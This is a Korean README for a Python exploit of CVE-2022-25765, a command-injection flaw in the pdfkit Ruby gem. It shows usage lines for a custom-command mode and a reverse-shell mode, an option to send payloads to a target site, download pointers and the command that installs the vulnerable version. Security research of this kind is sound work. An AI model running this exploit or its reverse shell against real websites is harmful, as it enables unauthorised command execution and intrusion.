
CVE-2022–25765 (pdfkit) 익스플로잇 - Command Injection

이 저장소가 마음에 드시나요? ⭐를 남겨주세요!
교육 및 승인된 보안 연구 목적으로만 사용하십시오.
@UNICORDev 제작 (@NicPWNs 및 @Dev-Yeoj)
pdfkit 패키지(0.0.0부터)는 URL이 제대로 삭제(샌니타이즈)되지 않아 명령 삽입(Command Injection)에 취약합니다.
루비 젬 pdfkit은 웹사이트 또는 HTML을 PDF 문서로 변환하는 데 일반적으로 사용됩니다. 이 소프트웨어의 취약한 버전(< 0.8.7.2)에는 실행될 명령을 포함하도록 특수하게 제작된 URL이 전달될 수 있습니다. 이 익스플로잇은 실행 가능한 URL을 생성하거나, pdfkit을 실행 중인 취약한 웹사이트에 해당 URL을 전송합니다.
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
-c 사용자 지정 명령 모드. 사용자 지정 페이로드를 생성할 명령을 제공합니다.
-s 리버스 셸 모드. 리버스 셸 페이로드를 생성할 로컬 IP와 포트를 제공합니다.
-w 취약한 pdfkit을 실행 중인 웹사이트의 URL. (선택 사항)
-p 취약한 pdfkit을 실행 중인 웹사이트의 POST 매개변수. (선택 사항)
-h 이 도움말 메뉴를 표시합니다.
GitHub에서 exploit-CVE-2022-25765.py 다운로드
ExploitDB에서 exploit-CVE-2022-25765.py 다운로드
searchsploit -u
searchsploit -m 51293


pdfkit 버전 0.8.6
pdfkit 버전 < 0.8.7.2
gem install pdfkit -v 0.8.6